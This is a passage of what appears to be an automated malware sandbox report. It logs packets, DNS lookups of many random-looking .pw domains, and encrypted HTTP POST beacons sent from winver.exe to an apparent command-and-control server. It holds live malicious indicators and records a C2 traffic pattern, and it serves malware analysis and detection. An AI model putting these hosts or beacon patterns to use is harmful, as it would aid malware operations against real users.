                                                                                                                                                                                        Dec 22, 2023 21:31:47.289103985 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.489974022 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.490220070 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.490220070 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.691344023 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.691407919 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.892277956 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.892774105 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.892884970 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.893059969 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:47.893239021 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:48.093873978 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:48.757961035 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:48.959671974 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:48.959911108 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:48.965379000 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.167006969 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.167076111 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.368465900 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369072914 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369086027 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369282007 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369642019 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.571001053 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.226514101 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.428354025 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.428479910 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.428587914 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.629724979 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.629816055 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.832439899 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.832914114 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.832963943 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.833229065 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.833509922 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:51.041887999 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:51.852108002 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.053277016 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.053369045 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.053474903 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.254337072 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.254502058 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.455352068 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456151009 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456187010 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456392050 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456672907 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.657572985 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:53.539206982 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:53.739938974 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:53.740031958 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:53.740170002 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:53.940859079 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:53.940949917 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:54.141681910 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143640041 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143652916 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143812895 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:00.129364014 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:00.179281950 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:06.119223118 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:06.163676023 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:12.157475948 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:12.210448027 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:18.121309042 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:18.163656950 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:24.172709942 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:24.226090908 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:30.113518953 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:30.163626909 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:36.151500940 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:36.197509050 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:42.219223022 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:42.273081064 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:48.476336002 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:48.522964001 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:54.267589092 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:54.319819927 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:33:00.311059952 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:33:00.366671085 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:33:06.116039038 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:33:06.163608074 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:33:12.149950981 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:33:12.194816113 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:33:18.203957081 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:33:18.257354021 CET4974880192.168.2.4216.218.185.162

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Dec 22, 2023 21:31:01.116009951 CET5427553192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:01.622597933 CET53542751.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:20.780147076 CET4965353192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:21.184664965 CET53496531.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:36.755748034 CET5127053192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:37.438705921 CET53512701.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:38.417537928 CET6087053192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:39.021545887 CET53608701.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:40.017096996 CET5477353192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:40.528918982 CET53547731.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:41.520317078 CET6520953192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:42.017582893 CET53652091.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.990463018 CET6516853192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:43.591897964 CET53651681.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.840640068 CET6231153192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:45.191015005 CET53623111.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:46.160896063 CET5308853192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:46.921212912 CET53530881.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:47.893970966 CET5455753192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:48.381458044 CET53545571.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.370465040 CET5770253192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:49.860517025 CET53577021.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.834176064 CET6126953192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:51.446839094 CET53612691.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.457361937 CET5484253192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:52.587080956 CET53548421.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.588097095 CET5822353192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 22, 2023 21:31:53.157351017 CET53582231.1.1.1192.168.2.4

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Dec 22, 2023 21:31:01.116009951 CET192.168.2.41.1.1.10xc212Standard query (0)spaines.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:20.780147076 CET192.168.2.41.1.1.10xc29Standard query (0)uyhgqunqkxnx.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:36.755748034 CET192.168.2.41.1.1.10x5677Standard query (0)vcklmnnejwxx.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:38.417537928 CET192.168.2.41.1.1.10xae5aStandard query (0)cmnsgscccrej.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:40.017096996 CET192.168.2.41.1.1.10xd99Standard query (0)evbsdqvgmpph.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:41.520317078 CET192.168.2.41.1.1.10x842fStandard query (0)mfueeimvyrsp.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:42.990463018 CET192.168.2.41.1.1.10x6d7dStandard query (0)utmyhnffxpcj.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:44.840640068 CET192.168.2.41.1.1.10x466Standard query (0)fkmmvfeonnyh.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:46.160896063 CET192.168.2.41.1.1.10xf1daStandard query (0)gfnlmtcolrrb.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:47.893970966 CET192.168.2.41.1.1.10xe359Standard query (0)wwgfyvvdtmeq.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:49.370465040 CET192.168.2.41.1.1.10x5fd9Standard query (0)xtbbpqfrsubt.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:50.834176064 CET192.168.2.41.1.1.10x4bdStandard query (0)vrmtybxxpddg.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:52.457361937 CET192.168.2.41.1.1.10xacfbStandard query (0)rvqlfnedcldh.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:52.588097095 CET192.168.2.41.1.1.10xd5abStandard query (0)fccfxejgtpqb.pwA (IP address)IN (0x0001)false

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Dec 22, 2023 21:31:01.622597933 CET1.1.1.1192.168.2.40xc212No error (0)spaines.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:21.184664965 CET1.1.1.1192.168.2.40xc29No error (0)uyhgqunqkxnx.pw45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:21.184664965 CET1.1.1.1192.168.2.40xc29No error (0)uyhgqunqkxnx.pw178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:21.184664965 CET1.1.1.1192.168.2.40xc29No error (0)uyhgqunqkxnx.pw104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:37.438705921 CET1.1.1.1192.168.2.40x5677No error (0)vcklmnnejwxx.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:39.021545887 CET1.1.1.1192.168.2.40xae5aNo error (0)cmnsgscccrej.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:40.528918982 CET1.1.1.1192.168.2.40xd99No error (0)evbsdqvgmpph.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:42.017582893 CET1.1.1.1192.168.2.40x842fNo error (0)mfueeimvyrsp.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:43.591897964 CET1.1.1.1192.168.2.40x6d7dNo error (0)utmyhnffxpcj.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:45.191015005 CET1.1.1.1192.168.2.40x466No error (0)fkmmvfeonnyh.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:46.921212912 CET1.1.1.1192.168.2.40xf1daNo error (0)gfnlmtcolrrb.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:48.381458044 CET1.1.1.1192.168.2.40xe359No error (0)wwgfyvvdtmeq.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:49.860517025 CET1.1.1.1192.168.2.40x5fd9No error (0)xtbbpqfrsubt.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:51.446839094 CET1.1.1.1192.168.2.40x4bdNo error (0)vrmtybxxpddg.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:52.587080956 CET1.1.1.1192.168.2.40xacfbName error (3)rvqlfnedcldh.pwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 22, 2023 21:31:53.157351017 CET1.1.1.1192.168.2.40xd5abNo error (0)fccfxejgtpqb.pw216.218.185.162A (IP address)IN (0x0001)false

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • https:
                                                                                                                                                                                          • www.bing.com
                                                                                                                                                                                        • spaines.pw
                                                                                                                                                                                        • uyhgqunqkxnx.pw
                                                                                                                                                                                        • vcklmnnejwxx.pw
                                                                                                                                                                                        • cmnsgscccrej.pw
                                                                                                                                                                                        • evbsdqvgmpph.pw
                                                                                                                                                                                        • mfueeimvyrsp.pw
                                                                                                                                                                                        • utmyhnffxpcj.pw
                                                                                                                                                                                        • fkmmvfeonnyh.pw
                                                                                                                                                                                        • gfnlmtcolrrb.pw
                                                                                                                                                                                        • wwgfyvvdtmeq.pw
                                                                                                                                                                                        • xtbbpqfrsubt.pw
                                                                                                                                                                                        • vrmtybxxpddg.pw
                                                                                                                                                                                        • fccfxejgtpqb.pw

                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.449735216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:19.712755919 CET93OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: spaines.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: fd 32 8e 32 cc 3a 8e 32 13 62 d0 aa fb 30 8f 11 cd 02 be 02 cd 02 be 02
                                                                                                                                                                                        Data Ascii: 22:2b0
                                                                                                                                                                                        Dec 22, 2023 21:31:19.914130926 CET133OUTData Raw: 00 80 00 00 00 77 ee f1 1d 7b 26 be ec 1a 51 ba f1 d2 a4 d3 f7 e9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 2b e5 1f ab 10 c0 9f 3e 9b 56 54 d5 5e 23 6d 30 c3 16 dd 0c 89 41 b8 b6 37 36 09 f4 e1 97 6c 02 a5 56 f9 15 81 89 de 1a 7f aa f1 02 7f
                                                                                                                                                                                        Data Ascii: w{&QYg6u#a+>VT^#m0A76lV4[hZ?L]VB68@Mngk(
                                                                                                                                                                                        Dec 22, 2023 21:31:20.115583897 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:20 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.44973645.77.249.79807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:35.805907011 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: uyhgqunqkxnx.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: 81 b7 8b db b9 bf 8b db 6f e7 d5 43 87 b5 8a f8 b1 87 bb eb b1 87 bb eb
                                                                                                                                                                                        Data Ascii: oC
                                                                                                                                                                                        Dec 22, 2023 21:31:36.170080900 CET133OUTData Raw: 00 80 00 00 00 71 e7 f8 13 64 36 a3 b3 01 5e d4 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ce fe 60 56 0c 92 ba b4 15 6a 76 8b 08 97 86 69 a6 93 66 71 df 3b 1e 53 be 0c c9 f1 bc 30 3a 40 02 e8 c1 85 78 a5 b2 db ec df 3d 01 f9
                                                                                                                                                                                        Data Ascii: qd6^Yg6u#a`Vjvifq;S0:@x=vF,W!yew/aa)G!;rc
                                                                                                                                                                                        Dec 22, 2023 21:31:36.754365921 CET75INHTTP/1.0 200 OK
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:36 GMT
                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.449737216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:38.006819010 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: vcklmnnejwxx.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: c0 9a d3 e5 f9 92 d3 e5 2e ca 8d 7d c6 98 d2 c6 f0 aa e3 d5 f0 aa e3 d5
                                                                                                                                                                                        Data Ascii: .}
                                                                                                                                                                                        Dec 22, 2023 21:31:38.208678007 CET133OUTData Raw: 00 80 00 00 00 72 fd fb 18 78 2d a3 a7 00 51 c2 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 16 59 8e 93 a4 3f 00 06 84 08 5d 76 22 d3 7b 9d 3b fe c1 a1 21 5c e4 13 56 bb 19 51 a5 1b 8d bf 78 e0 b1 a8 e9 a0 91 bf 02 d9 5c a6 e8
                                                                                                                                                                                        Data Ascii: rx-QYg6u#aY?]v"{;!\VQx\<Z0^&@TvHUJ%6r]]Y
                                                                                                                                                                                        Dec 22, 2023 21:31:38.416371107 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:38 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.449738216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:39.602699995 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: cmnsgscccrej.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: 4f 34 bc a9 75 3c bc a9 a1 64 e2 31 49 36 bd 8a 7f 04 8c 99 7f 04 8c 99
                                                                                                                                                                                        Data Ascii: O4u<d1I6
                                                                                                                                                                                        Dec 22, 2023 21:31:39.807910919 CET133OUTData Raw: 00 80 00 00 00 67 f3 fe 07 72 30 ae a1 09 54 df 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 4a 56 8c 55 6d 6f 02 c4 15 b6 42 b8 82 51 7a 5f c4 d7 c2 67 f8 a6 e5 d1 b1 24 1f 8f 18 bf 8f 7d b2 03 b3 6e fa b4 af 7d cc 52 52 68 ab
                                                                                                                                                                                        Data Ascii: gr0TYg6u#aJVUmoBQz_g$}n}RRhk-0ZL[8`,5mOXQtlJS*g_>
                                                                                                                                                                                        Dec 22, 2023 21:31:40.013947964 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:39 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        4192.168.2.449739216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:41.115704060 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: evbsdqvgmpph.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: f4 47 54 60 cf 4f 54 60 1a 17 0a f8 f2 45 55 43 c4 77 64 50 c4 77 64 50
                                                                                                                                                                                        Data Ascii: GT`OT`EUCwdPwdP
                                                                                                                                                                                        Dec 22, 2023 21:31:41.316890955 CET133OUTData Raw: 00 80 00 00 00 61 e8 f2 07 71 32 bb a5 07 56 ca 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ee 68 0d 2d 27 76 81 bc 6b 99 dd f0 d2 e8 fb 16 7d 10 41 2e 4b 78 64 98 d0 06 98 d6 73 7d 0e 24 c0 dd 30 36 87 5a 2e 25 ea 6a dd 20 b4
                                                                                                                                                                                        Data Ascii: aq2VYg6u#ah-'vk}A.Kxds}$06Z.%j _#Vx^TdzlkTyuc~s6
                                                                                                                                                                                        Dec 22, 2023 21:31:41.519004107 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:41 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        5192.168.2.449740216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:42.585880041 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: mfueeimvyrsp.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: 52 0c 05 15 6e 04 05 15 bc 5c 5b 8d 54 0e 04 36 62 3c 35 25 62 3c 35 25
                                                                                                                                                                                        Data Ascii: Rn\[T6b<5%b<5%
                                                                                                                                                                                        Dec 22, 2023 21:31:42.787332058 CET133OUTData Raw: 00 80 00 00 00 69 f8 e5 11 70 2a a0 b4 13 54 c9 81 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 33 30 43 e0 16 27 5b 71 92 3a 08 05 11 a8 cc e3 ae 11 34 d3 45 ce 2f 65 7e 0a 46 24 1f ac c0 d2 f0 e9 0a c5 60 32 64 ea ec 88 8b f3 da
                                                                                                                                                                                        Data Ascii: ip*TYg6u#a30C'[q:4E/e~F$`2dnkd]'5gfNDn jFJ
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989285946 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:42 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        6192.168.2.449741216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:44.432614088 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: utmyhnffxpcj.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: a4 50 75 f5 98 58 75 f5 4a 00 2b 6d a2 52 74 d6 94 60 45 c5 94 60 45 c5
                                                                                                                                                                                        Data Ascii: PuXuJ+mRt`E`E
                                                                                                                                                                                        Dec 22, 2023 21:31:44.637525082 CET133OUTData Raw: 00 80 00 00 00 71 ea fd 0d 7d 2d ab a4 12 56 d9 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 20 72 94 a6 63 8b 6a 3b 4f c7 7b 4b 46 f5 9d a9 9c f2 eb 96 ac d3 fe 20 07 1f 76 5e 88 04 b0 ac 3f ac b3 bd 1f 64 86 a0 54 2b 34 bd 39
                                                                                                                                                                                        Data Ascii: q}-VYg6u#a rcj;O{KF v^?dT+49[K?JdrW-\ma,h_;#JC<
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839683056 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:44 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
